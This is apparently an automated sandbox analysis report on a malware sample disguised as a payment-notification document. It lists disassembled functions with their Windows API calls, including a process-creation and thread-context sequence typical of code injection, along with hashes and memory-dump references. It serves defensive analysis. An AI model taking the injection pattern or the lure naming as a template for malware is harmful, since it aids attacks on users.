Opcode Fuzzy Hash: e8a9a4a5df90c698c745d96397e13698fa890d8c98c847d7af50eecd1471e734
Instruction Fuzzy Hash: F1227C70608209DFCB14DF28C484A2ABBF1FF99354F14892DF696CB261D775E845CB92

Function 008E2DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 00922C8C

Part of subcall function 008E3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008E3A97,?,?,008E2E7F,?,?,?,00000000), ref: 008E3AC2

Part of subcall function 008E2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008E2DC4

Strings

X, xrefs: 00922C5A

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X
API String ID: 779396738-3081909835
Opcode ID: ddefdb7a4d56278dd2090d9fba325aeb10c1c3de737a69e3064f33c4c547e571
Instruction ID: 964928d853704931e82e3b1da3ec130545d4262568ed5c1728abd8656d587051
Opcode Fuzzy Hash: ddefdb7a4d56278dd2090d9fba325aeb10c1c3de737a69e3064f33c4c547e571
Instruction Fuzzy Hash: B621C671A002989FCB01DF99C809BEE7BFCEF4A314F004059E405E7241DBB499898BA1

Function 008E3837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 008E3908

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 97ef991649ebd9fbb8db2b33e8cdcc23203b2cc0c0fe61476acd485610c9ef7b
Instruction ID: b5428bb382779d9cb9e871911a91288d1b18eeb494255cc7dd74fa3c24e66ba3
Opcode Fuzzy Hash: 97ef991649ebd9fbb8db2b33e8cdcc23203b2cc0c0fe61476acd485610c9ef7b
Instruction Fuzzy Hash: F031C3B15083408FD720DF25D8987A7BBE8FB4A718F00092EF699C3250E771AE44CB52

Function 008E5745 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,008E949C,?,00008000), ref: 008E5773
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,008E949C,?,00008000), ref: 00924052

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: a606f727b42db7be00bc70b52ac62e12e64b864a3a878421095caecf5db43353
Instruction ID: da21d498a9ad9ec19ddde5d79d721c46977761eace11a3fc89128937a11237d4
Opcode Fuzzy Hash: a606f727b42db7be00bc70b52ac62e12e64b864a3a878421095caecf5db43353
Instruction Fuzzy Hash: 69015631185225B6E3304A2ADC0EF977F58EF02BB5F148314BE5C9A1E0C7B45494DB90

Function 008EB710 Relevance: 2.1, APIs: 1, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 008EBB4E

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: 639ed348f62e2b8871abd4428bad85e632286768e06f3658ff3aca860ad702f2
Instruction ID: e1fe0821bb9c7ffe50a7f2377d38f00b4259febf2567b741c6bcd33ea541f7bc
Opcode Fuzzy Hash: 639ed348f62e2b8871abd4428bad85e632286768e06f3658ff3aca860ad702f2
Instruction Fuzzy Hash: 4232EC30A04259DFCB20CF59C8A4ABFB7B9FF86314F148069EA15AB261D774ED41CB91

Function 041BE50D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 041BECCB
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 041BED61
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 041BED83

Memory Dump Source

Source File: 00000000.00000002.1707992061.00000000041BD000.00000040.00000020.00020000.00000000.sdmp, Offset: 041BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41bd000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
Instruction ID: ddc3a6ddbde0af3e071e595ee71e0286fad9b37a98be89485a4be96e40c6d815
Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
Instruction Fuzzy Hash: 0612DC24A24658C6EB24DF64D8507DEB232EF68300F1090E9D10DEB7A5E77A5E81CF5A

Function 0096709C Relevance: 1.8, APIs: 1, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: c092f5a3c1fff569df3eda2d55e40b3a1a19746db69b255a5d3852c60283645b
Instruction ID: 91727ec2e22e734e53316ab8e8a7dc06eaf57e1ca0b1031b0530c3277bd63571
Opcode Fuzzy Hash: c092f5a3c1fff569df3eda2d55e40b3a1a19746db69b255a5d3852c60283645b
Instruction Fuzzy Hash: DBD16934A0420AEFCB14DFD9D8819ADFBB5FF49314F14415AE915AB391EB30AD81CB91

Function 008FFC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 008FFD1F

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 19f16fd574091cf678089c7e52cb3d374d5b42f3bdf4c1a8329ff0381ed8f3c2
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 0E31F274A0011EDBD718DF69D480969FBA2FF49304B2486A5EA09CB656E731EEC1CBD0

Function 008E4ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 008E4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,008E4EDD,?,009B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008E4E9C
Part of subcall function 008E4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 008E4EAE
Part of subcall function 008E4E90: FreeLibrary.KERNEL32(00000000,?,?,008E4EDD,?,009B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008E4EC0

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,009B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008E4EFD

Part of subcall function 008E4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00923CDE,?,009B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008E4E62
Part of subcall function 008E4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 008E4E74
Part of subcall function 008E4E59: FreeLibrary.KERNEL32(00000000,?,?,00923CDE,?,009B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008E4E87

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: 384d7d359e7bd34eb3e97d35faed440e36ade25832396be65988fb0bffeddc49
Instruction ID: 410d3f0fd7d8bad53b9ffe1352a41a433cdf0d5bb12cf1c4dc246e2921a2c780
Opcode Fuzzy Hash: 384d7d359e7bd34eb3e97d35faed440e36ade25832396be65988fb0bffeddc49
Instruction Fuzzy Hash: AF11E332610205AACF14FB6ADC02FAD77A5FF81B14F10882DF54AE61C1EE749A459751

Function 00918402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00918440

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: a7417fdac8ee5af79f9636175ab1472027bb937f4e199420493ab7bb886b1dc8
Instruction ID: 8df5a26e7c9643bd1664bd64ebcc83ca2c43283cb6a26ac9ca5192c6048375b1
Opcode Fuzzy Hash: a7417fdac8ee5af79f9636175ab1472027bb937f4e199420493ab7bb886b1dc8
Instruction Fuzzy Hash: 58114875A0410AAFCF05DF58E941ADB7BF9EF48310F104059F808AB352DA30DA11DBA4

Function 00915000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00914C7D: RtlAllocateHeap.NTDLL(00000008,008E1129,00000000,?,00912E29,00000001,00000364,?,?,?,0090F2DE,00913863,009B1444,?,008FFDF5,?), ref: 00914CBE

_free.LIBCMT ref: 0091506C

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction ID: 1d2729c05727d938cabde99966e51720ac0ecb83c97a84c8e72dcc4a8515f11f
Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction Fuzzy Hash: 71012B72304708ABE3218F559841ADAFBECFBC9370F66051DE194932C0E6306845C6B4

Function 0090E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction ID: 06f5a3f64737e294255afaffbf0d893b761c9d39ddeb74f3f0606aea3518063d
Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction Fuzzy Hash: 69F02832611A189ED7313A69AC05B9B339C9FD2335F100F15F431D71D2CF75E84186A5

Function 008E9CB3 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 008E9CBD

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: 10c9670d2fbedfdd3de16219deb42da2e1224f8142166eedce00cb261b24ac3f
Instruction ID: a24ce0393d4c53c4eb706203481c6c20804736ae3d49168d44e91bd8564fd5c7
Opcode Fuzzy Hash: 10c9670d2fbedfdd3de16219deb42da2e1224f8142166eedce00cb261b24ac3f
Instruction Fuzzy Hash: 88F0A4B26016046ED7259F29D806B6ABB98EF84760F10852AFB19CB1D1DB71E51086A0

Function 00914C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,008E1129,00000000,?,00912E29,00000001,00000364,?,?,?,0090F2DE,00913863,009B1444,?,008FFDF5,?), ref: 00914CBE

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 311a99f5267ca7087aee1c41914c691aab27b2675ed3eda767eebaabf900ea71
Instruction ID: fc4647b72c511a57fba32a46852a5b3a57586ae49ae36da7b72186986cef8eb7
Opcode Fuzzy Hash: 311a99f5267ca7087aee1c41914c691aab27b2675ed3eda767eebaabf900ea71
Instruction Fuzzy Hash: ABF0E93174622C6BDB215F669C09BDA378CBF957B0B148125BDA9A65D0CA30D88096E0

Function 00913820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,009B1444,?,008FFDF5,?,?,008EA976,00000010,009B1440,008E13FC,?,008E13C6,?,008E1129), ref: 00913852

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 949542fa992ac8339cca61fb5dd72c49195c38ca560ccaafc0f420c93595d499
Instruction ID: f8884b01ee2ea1e994d23fe7d97739796a8870a45df305c689955a5df57e81bd
Opcode Fuzzy Hash: 949542fa992ac8339cca61fb5dd72c49195c38ca560ccaafc0f420c93595d499
Instruction Fuzzy Hash: A6E0E53130422C9AD63127669C04BDA377CAB827B0F05C1A0BD1992CD0DB10DE8181E0

Function 008E4F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,009B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008E4F6D

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 032ff3e6a0c1f92005c9d63d9806bb02a2f16dbbab393008f39df00fff3759d9
Instruction ID: d90350bcfebac2d20f774561b9dec24329e37a17f818ee33feeae29d90d01794
Opcode Fuzzy Hash: 032ff3e6a0c1f92005c9d63d9806bb02a2f16dbbab393008f39df00fff3759d9
Instruction Fuzzy Hash: A6F01C71105791CFDB349F66D494812B7E4FF15719310997EE1EE82511CB359C84DB50

Function 0094CCFF Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,0092EE51,009A3630,00000002), ref: 0094CD26

Part of subcall function 0094CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,0094CD19,?,?,?), ref: 0094CC59
Part of subcall function 0094CC37: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,0094CD19,?,?,?,?,0092EE51,009A3630,00000002), ref: 0094CC6E
Part of subcall function 0094CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,0094CD19,?,?,?,?,0092EE51,009A3630,00000002), ref: 0094CC7A

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: File$Pointer$Write
String ID:
API String ID: 3847668363-0
Opcode ID: 67536c6e3a5731c116b4dc40ba0efadae26530ce5ed82b5436f14a443c77041f
Instruction ID: b58e91a27f14aa8ab6733aa418608de6dcf87dcd2a5b3d4fbcf0ec7e42b9a682
Opcode Fuzzy Hash: 67536c6e3a5731c116b4dc40ba0efadae26530ce5ed82b5436f14a443c77041f
Instruction Fuzzy Hash: 09E03076400604EFC7219F56D941C9ABBF8FF84751710852FE99582114D771AA54DB60

Function 008E2DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008E2DC4

Part of subcall function 008E6B57: _wcslen.LIBCMT ref: 008E6B6A

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: 6de7f2b415c3557f34796a73351ae0f1800bde45458397852044a18c8d4481e3
Instruction ID: 13802ecb18c35bd67c5232ebfa84e1d4e3c7560424a0c3fdd0aab5e663a6726a
Opcode Fuzzy Hash: 6de7f2b415c3557f34796a73351ae0f1800bde45458397852044a18c8d4481e3
Instruction Fuzzy Hash: 7EE0CD726041245BC71092589C05FDA77DDEFC87D0F040075FD09D7258DA60EDC08551

Function 008E2B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 008E3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 008E3908

Part of subcall function 008ED730: GetInputState.USER32 ref: 008ED807

SetCurrentDirectoryW.KERNEL32(?), ref: 008E2B6B

Part of subcall function 008E30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 008E314E

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: f592ffca3168cc947d7e8e5f5fb64b2e2e68a3fbe387e4b275f2d53d2301b736
Instruction ID: fe90da762833e17b94a52b9526af4db108ef09596f1607f93f2e385b3f0e9d99
Opcode Fuzzy Hash: f592ffca3168cc947d7e8e5f5fb64b2e2e68a3fbe387e4b275f2d53d2301b736
Instruction Fuzzy Hash: 0BE0DF2230828402C604BB2AA82A5ADA34AEBD3321F80053EF092C3172CE2049894213

Function 0092039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00920704,?,?,00000000,?,00920704,00000000,0000000C), ref: 009203B7

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
